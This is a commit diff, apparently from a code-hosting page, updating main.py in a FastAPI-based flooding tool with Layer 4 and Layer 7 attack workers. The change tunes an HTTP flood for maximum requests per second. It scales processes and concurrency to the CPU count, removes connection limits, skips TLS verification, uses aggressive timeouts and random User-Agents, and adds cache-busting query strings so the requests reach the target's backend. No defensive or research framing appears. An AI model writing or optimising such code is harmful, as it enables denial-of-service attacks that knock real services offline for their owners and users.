Update main.py
Browse files
main.py
CHANGED
|
@@ -35,23 +35,23 @@ app = FastAPI(
|
|
| 35 |
CPU_COUNT = psutil.cpu_count(logical=True) or 8
|
| 36 |
TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
|
| 37 |
|
| 38 |
-
#
|
| 39 |
-
#
|
| 40 |
if CPU_COUNT >= 32:
|
| 41 |
-
# High-core systems (32-64+ cores)
|
| 42 |
-
MAX_PROCESSES =
|
| 43 |
-
MAX_CONCURRENCY_PER_PROCESS =
|
| 44 |
elif CPU_COUNT >= 16:
|
| 45 |
-
MAX_PROCESSES = CPU_COUNT *
|
| 46 |
-
MAX_CONCURRENCY_PER_PROCESS =
|
| 47 |
elif CPU_COUNT >= 8:
|
| 48 |
-
MAX_PROCESSES = CPU_COUNT *
|
| 49 |
-
MAX_CONCURRENCY_PER_PROCESS =
|
| 50 |
else:
|
| 51 |
MAX_PROCESSES = CPU_COUNT * 4
|
| 52 |
-
MAX_CONCURRENCY_PER_PROCESS =
|
| 53 |
|
| 54 |
-
STATS_BATCH_UPDATE_SIZE =
|
| 55 |
TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
|
| 56 |
|
| 57 |
# --- L7 Enhanced Headers Pool ---
|
|
@@ -246,46 +246,48 @@ def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type,
|
|
| 246 |
# OPTIMIZED L7 WORKER PROCESS
|
| 247 |
# ====================================================================================
|
| 248 |
async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
|
| 249 |
-
"""
|
| 250 |
ssl_context = ssl.create_default_context()
|
| 251 |
ssl_context.check_hostname = False
|
| 252 |
ssl_context.verify_mode = ssl.CERT_NONE
|
| 253 |
|
| 254 |
-
#
|
| 255 |
connector = aiohttp.TCPConnector(
|
| 256 |
-
limit=
|
| 257 |
-
limit_per_host=
|
| 258 |
ttl_dns_cache=300,
|
| 259 |
force_close=False,
|
| 260 |
enable_cleanup_closed=False,
|
| 261 |
keepalive_timeout=120
|
| 262 |
)
|
| 263 |
|
| 264 |
-
#
|
| 265 |
-
timeout = aiohttp.ClientTimeout(total=
|
| 266 |
|
| 267 |
async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
|
| 268 |
async def task_worker(worker_id):
|
| 269 |
-
"""
|
| 270 |
local_counter = 0
|
|
|
|
| 271 |
|
| 272 |
while not stop_event.is_set():
|
| 273 |
try:
|
| 274 |
-
#
|
| 275 |
async with session.get(
|
| 276 |
-
f"{url}
|
| 277 |
-
headers=
|
|
|
|
|
|
|
|
|
|
| 278 |
allow_redirects=False,
|
| 279 |
timeout=timeout
|
| 280 |
) as resp:
|
| 281 |
-
# Just get status, don't read body
|
| 282 |
_ = resp.status
|
| 283 |
local_counter += 1
|
| 284 |
except:
|
| 285 |
-
# Errors don't slow us down
|
| 286 |
pass
|
| 287 |
|
| 288 |
-
#
|
| 289 |
if local_counter >= STATS_BATCH_UPDATE_SIZE:
|
| 290 |
with shared_counter.get_lock():
|
| 291 |
shared_counter.value += local_counter
|
|
@@ -296,7 +298,7 @@ async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
|
|
| 296 |
with shared_counter.get_lock():
|
| 297 |
shared_counter.value += local_counter
|
| 298 |
|
| 299 |
-
# Launch tasks
|
| 300 |
tasks = [asyncio.create_task(task_worker(i)) for i in range(concurrency)]
|
| 301 |
await asyncio.gather(*tasks, return_exceptions=True)
|
| 302 |
|
|
|
|
| 35 |
CPU_COUNT = psutil.cpu_count(logical=True) or 8
|
| 36 |
TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
|
| 37 |
|
| 38 |
+
# OPTIMIZED configuration for maximum sustained RPS
|
| 39 |
+
# Balance: enough workers to saturate bandwidth, not so many they block each other
|
| 40 |
if CPU_COUNT >= 32:
|
| 41 |
+
# High-core systems (32-64+ cores)
|
| 42 |
+
MAX_PROCESSES = CPU_COUNT * 2 # 128 processes for 64 cores
|
| 43 |
+
MAX_CONCURRENCY_PER_PROCESS = 256 # Higher concurrency
|
| 44 |
elif CPU_COUNT >= 16:
|
| 45 |
+
MAX_PROCESSES = CPU_COUNT * 3
|
| 46 |
+
MAX_CONCURRENCY_PER_PROCESS = 384
|
| 47 |
elif CPU_COUNT >= 8:
|
| 48 |
+
MAX_PROCESSES = CPU_COUNT * 6 # 48 processes for 8 cores
|
| 49 |
+
MAX_CONCURRENCY_PER_PROCESS = 768
|
| 50 |
else:
|
| 51 |
MAX_PROCESSES = CPU_COUNT * 4
|
| 52 |
+
MAX_CONCURRENCY_PER_PROCESS = 512
|
| 53 |
|
| 54 |
+
STATS_BATCH_UPDATE_SIZE = 250 # Larger batches = less lock contention
|
| 55 |
TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
|
| 56 |
|
| 57 |
# --- L7 Enhanced Headers Pool ---
|
|
|
|
| 246 |
# OPTIMIZED L7 WORKER PROCESS
|
| 247 |
# ====================================================================================
|
| 248 |
async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
|
| 249 |
+
"""Ultra-optimized L7 worker for maximum sustained RPS."""
|
| 250 |
ssl_context = ssl.create_default_context()
|
| 251 |
ssl_context.check_hostname = False
|
| 252 |
ssl_context.verify_mode = ssl.CERT_NONE
|
| 253 |
|
| 254 |
+
# High-performance connector settings
|
| 255 |
connector = aiohttp.TCPConnector(
|
| 256 |
+
limit=0, # Unlimited - let OS handle it
|
| 257 |
+
limit_per_host=0,
|
| 258 |
ttl_dns_cache=300,
|
| 259 |
force_close=False,
|
| 260 |
enable_cleanup_closed=False,
|
| 261 |
keepalive_timeout=120
|
| 262 |
)
|
| 263 |
|
| 264 |
+
# Aggressive timeouts
|
| 265 |
+
timeout = aiohttp.ClientTimeout(total=2, connect=1, sock_read=1)
|
| 266 |
|
| 267 |
async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
|
| 268 |
async def task_worker(worker_id):
|
| 269 |
+
"""Tight request loop."""
|
| 270 |
local_counter = 0
|
| 271 |
+
cache_base = f"?w{worker_id}="
|
| 272 |
|
| 273 |
while not stop_event.is_set():
|
| 274 |
try:
|
| 275 |
+
# Ultra-minimal request
|
| 276 |
async with session.get(
|
| 277 |
+
f"{url}{cache_base}{local_counter}",
|
| 278 |
+
headers={
|
| 279 |
+
"User-Agent": random.choice(USER_AGENTS),
|
| 280 |
+
"Connection": "keep-alive"
|
| 281 |
+
},
|
| 282 |
allow_redirects=False,
|
| 283 |
timeout=timeout
|
| 284 |
) as resp:
|
|
|
|
| 285 |
_ = resp.status
|
| 286 |
local_counter += 1
|
| 287 |
except:
|
|
|
|
| 288 |
pass
|
| 289 |
|
| 290 |
+
# Less frequent counter updates for speed
|
| 291 |
if local_counter >= STATS_BATCH_UPDATE_SIZE:
|
| 292 |
with shared_counter.get_lock():
|
| 293 |
shared_counter.value += local_counter
|
|
|
|
| 298 |
with shared_counter.get_lock():
|
| 299 |
shared_counter.value += local_counter
|
| 300 |
|
| 301 |
+
# Launch all tasks
|
| 302 |
tasks = [asyncio.create_task(task_worker(i)) for i in range(concurrency)]
|
| 303 |
await asyncio.gather(*tasks, return_exceptions=True)
|
| 304 |
|